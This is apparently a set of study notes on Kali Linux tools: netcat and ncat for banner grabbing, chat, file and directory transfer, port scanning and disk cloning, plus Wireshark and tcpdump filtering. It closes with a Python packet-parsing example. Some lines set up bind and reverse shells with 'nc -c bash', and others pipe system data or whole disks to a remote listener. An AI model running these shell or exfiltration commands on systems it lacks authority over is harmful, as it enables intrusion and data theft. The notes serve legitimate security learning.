Kali Linux penetration testing study notes - Kali Linux basic tools
Here is just a brief description of what each tool does~~
Common tools
- Often used and powerful
- An indispensable helper for security practitioners
- NC / ncat
- wireshark
- tcpdump
NETCAT - NC
- The Swiss Army Knife in Network Tools-Small Body, Great Wisdom
- Listening mode / transmission mode
- telnet / get banner information
- Transfer text messages
- Transfer files/directories
- Encrypted transfer of files
- Remote control / Trojan horse
- Encrypt all traffic
- Streaming media service
- Clone hard disk remotely
NC —— telnet / banner
nc -h shows how the parameters are used; -v shows verbose information; -n is followed by a numeric IP address
When a client connects to a server port, the banner information can be seen.
nc -nv 1.1.1.1 110 // port 110 is opened by the POP3 (Post Office Protocol 3) service
nc -nv 1.1.1.1 25 // port 25 is opened by an SMTP server, mainly used to send mail
nc -nv 1.1.1.1 80 // port 80 is opened for HTTP (Hypertext Transfer Protocol)
NC —— Transmit text information
For example, a simple chat between two people~~
A: nc -l -p 4444 // one host opens a port: -l listens on a port, -p gives the port number
B: nc -nv 1.1.1.1 4444 // the other host connects to the open port as a client
When one end terminates, both ends terminate.
Remote electronic forensics
Modify the file contents on the audited computer as little as possible, so as not to destroy evidence.
Listen on an open port on the local machine and run the nc command on the computer being examined.
Local machine: nc -l -p 4444
Computer being examined: ls -l | nc -nv 1.1.1.1 4444
The file listing of the examined computer now appears on the local machine; this is the information-gathering step of remote electronic forensics.
Local machine: nc -l -p 4444 > ps.txt // save the received data to ps.txt
Computer being examined: ps aux | nc -nv 1.1.1.1 4444 -q 1 // -q 1: wait one second after the data is sent, then close the connection
Here nc is mainly used to collect some electronic forensics information.
NC —— transfer files/directories
Transfer a file
The receiving end opens the port:
A: nc -lp 333 > 1.mp4 // > redirects what arrives on the port into 1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 // < feeds the file into nc's connection
or
The sending end opens the port:
A: nc -q 1 -lp 333 < 1.mp4
B: nc -nv 1.1.1.1 333 > 1.mp4 // press Enter and the connection is established
Transfer a directory
Pack it first, then transfer~
A: tar -cvf - music/ | nc -lp 333 -q 1
B: nc -nv 1.1.1.1 333 | tar -xvf - // the directory goes from A to B
Encrypted file transfer
A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
The encryption settings and the decryption settings must match.
NC —— Streaming Media Service
A:cat 1.mp4 | nc -lp 333
B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
NC —— Port Scan
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024 // open UDP ports
Not as powerful as nmap, and with far fewer features.
NC —— Remote Clone Hard Disk
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
For remote electronic forensics, the target server's hard disk (or its memory) can be copied remotely,
reproduced completely onto a new disk, exactly identical.
NC-remote control
Forward:
A: nc -lp 333 -c bash // after the connection is established, a shell is run
B: nc 1.1.1.1 333 // after connecting, B can run bash commands to control A
Reverse:
A: nc -lp 333 // after connecting, A can run bash commands to control B
B: nc 1.1.1.1 333 -c bash // the controlled side
A bit like the remote control feature in QQ~~
Note: Windows users replace bash with cmd.
NC —— NCAT (Kali 2.0 seems to have this command~)
NC lacks encryption and authentication: all data is transmitted in plaintext, so it can be ARP-spoofed and sniffed;
because there is no authentication, an open port is also easily found by other people's scans and abused~
NCAT makes up for NC's lack of encryption and authentication.
NCAT is included in the nmap package.
A: ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
--allow only permits the given IP to connect; --ssl encrypts the connection
B: ncat -nv 1.1.1.1 333 --ssl
--ssl ensures both sides encrypt and decrypt the same way
All transmitted data is encrypted, because the pipe itself is encrypted; a sniffer capturing packets cannot see the transmitted content!
The implementation is fundamentally different from NC!!! Authentication is based on the IP address!!!
Although nc is powerful, it exists in many versions, and the parameters and functions of nc differ across systems/platforms;
for example, Ubuntu's nc does not have the -c parameter, so pay attention to differences in parameters and commands when using it on different platforms.
WIRESHARK
- Analysis of packet sniffing protocol
- Essential skills for security experts
- Capture engine
- Libpcap (Linux)
- WinPcap (Windows)
- Decoding ability
WIRESHARK-Basic usage
- The simple method of use is as follows:
- start up
- Select the packet capture network card, you can also filter
- To implement packet capture, double-click the network card, or as follows:
- To save and analyze the captured file, stop first:
If you want to continue the analysis after saving, drag it directly to view:
- Preferences
can be personalized settings:
for example, add two columns, source MAC address and destination MAC address:
WIRESHARK-filter
- Filter out interfering packets
- The capture filter is similar to the display filter, except that it filters at capture time, before packets are recorded:
- Display filter
can filter different packages according to different conditions
ip.addr == 192.168.1.122 // filter by IP address, matching either the source or the destination IP
ip.src == 192.168.1.122 // filter by source IP address
ip.dst == 192.168.1.122 // filter by destination IP address
...........
WIRESHARK-common protocol package
- The hierarchical structure of the data packet: the protocol can be clearly observed through the hierarchical structure
- ARP
- ICMP: ping packets
- TCP-three-way handshake
- UDP
- DNS
- HTTP
- FTP
WIRESHARK —— TCP stream
- Right click to follow the TCP stream~~~
- Data stream: follow it to view the detailed data
- HTTP-clear text transmission
- SMTP
- POP3
- SSL-ciphertext transmission
- …
WIRESHARK —— Information Statistics
Located:
You can view the following information:
- Number of nodes
- Protocol analysis
- Packet size distribution
- Session connection
- Decoding method
- expert system
- Usually thousands of packets are captured. When looking for anomalies, we basically start from the information statistics: this makes it easier and faster to find abnormal traffic, and is far more efficient than going through packets one by one!!!
WIRESHARK-Practice
- Capture packets and compare nc and ncat encrypted and unencrypted traffic
- Under nc:
Poor me, my Kali seems to have no ncat command.....
and I did not find a solution.... I also take it; is it only available in Kali 1??
I hope anyone who knows will tell me, thank you!!
Needless to say, in any case, when using ncat the captured data is encrypted, so the plaintext is hard to see!!!!
TCPDUMP
- No-GUI packet capture analysis tool
- Installed by default on Linux and Unix systems
- Unlike wireshark, it is not a graphical interface
TCPDUMP-packet capture
- Capture
- Only capture 68 bytes by default
- tcpdump -i eth0 -s 0 -w file.pcap // -s sets how many bytes of each packet to capture, 0 means capture the whole packet; -w saves to a file
- tcpdump -i eth0 port 22 // equivalent to filtering: only port 22 packets are captured
- Read the capture file
- tcpdump -r file.pcap
TCPDUMP-Screening
- tcpdump -n -r http.cap | awk '{print $3}' | sort -u
- tcpdump -n src host 145.254.160.237 -r http.cap // display by source IP
- tcpdump -n dst host 145.254.160.237 -r http.cap // display by destination IP
- tcpdump -n port 53 -r http.cap // display the traffic on port 53
- tcpdump -nX port 80 -r http.cap // display port 80 traffic in hexadecimal
TCPDUMP-advanced filtering
- tcpdump -A -n 'tcp[13] = 24' -r http.cap // display packets whose TCP header byte at offset 13 (tcp[13]) equals 24
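The filter expressions in these notes (ip.addr / ip.src / ip.dst in Wireshark, `port 53` and `tcp[13] = 24` in tcpdump) all test specific header fields; as an added example that is not part of the original notes, this Python reimplements them over constructed IPv4/TCP packets so that what `tcp[13] = 24` selects (the flags byte equal to 0x18, i.e. PSH|ACK data segments) becomes visible. The server address 192.0.2.10 and the ports are made up; only the client IP comes from the notes.

```python
import ipaddress
import struct

# Constructed hosts (not a real capture): the client IP the notes filter on, and a test-range server.
CLIENT, SERVER = "145.254.160.237", "192.0.2.10"

def build_packet(src, dst, sport, dport, flags):
    """Minimal IPv4 + TCP header (no options/payload), checksums left at 0."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                         ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    # data offset 5 words (20 bytes); byte 13 of the TCP header is the flags byte
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    return ip_hdr + tcp_hdr

def parse(pkt):
    """Extract the fields the page's Wireshark/tcpdump filters refer to."""
    ihl = (pkt[0] & 0x0F) * 4                    # IPv4 header length in bytes
    tcp = pkt[ihl:]                              # tcpdump's tcp[n] indexes into this
    sport, dport = struct.unpack("!HH", tcp[:4])
    return {"ip.src": str(ipaddress.ip_address(pkt[12:16])),
            "ip.dst": str(ipaddress.ip_address(pkt[16:20])),
            "sport": sport, "dport": dport, "tcp": tcp}

TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}

def flag_names(flags_byte):
    """Decode tcp[13]: 24 == 0x18 == PSH|ACK, the usual value on a data segment."""
    return [name for bit, name in sorted(TCP_FLAGS.items()) if flags_byte & bit]

# Each filter from the notes becomes a predicate over one raw packet.
def ip_addr(pkt, a):   # Wireshark: ip.addr == a  (source OR destination)
    f = parse(pkt); return a in (f["ip.src"], f["ip.dst"])
def ip_src(pkt, a):    # Wireshark: ip.src == a
    return parse(pkt)["ip.src"] == a
def ip_dst(pkt, a):    # Wireshark: ip.dst == a
    return parse(pkt)["ip.dst"] == a
def port(pkt, p):      # tcpdump: port p  (either direction)
    f = parse(pkt); return p in (f["sport"], f["dport"])
def tcp_byte(pkt, offset, value):  # tcpdump: 'tcp[offset] = value'
    return parse(pkt)["tcp"][offset] == value

def select(pkts, pred, *args):  # indices of matching packets, like tcpdump -r over a file
    return [i for i, p in enumerate(pkts) if pred(p, *args)]

# Constructed three-way handshake plus one data segment, client -> server.
PACKETS = [build_packet(CLIENT, SERVER, 3372, 80, 0x02),   # SYN
           build_packet(SERVER, CLIENT, 80, 3372, 0x12),   # SYN|ACK
           build_packet(CLIENT, SERVER, 3372, 80, 0x10),   # ACK
           build_packet(CLIENT, SERVER, 3372, 80, 0x18)]   # PSH|ACK = 24
```

Running `select(PACKETS, tcp_byte, 13, 24)` returns only the last packet, which is why the tcpdump expression above picks out data-carrying segments rather than the handshake.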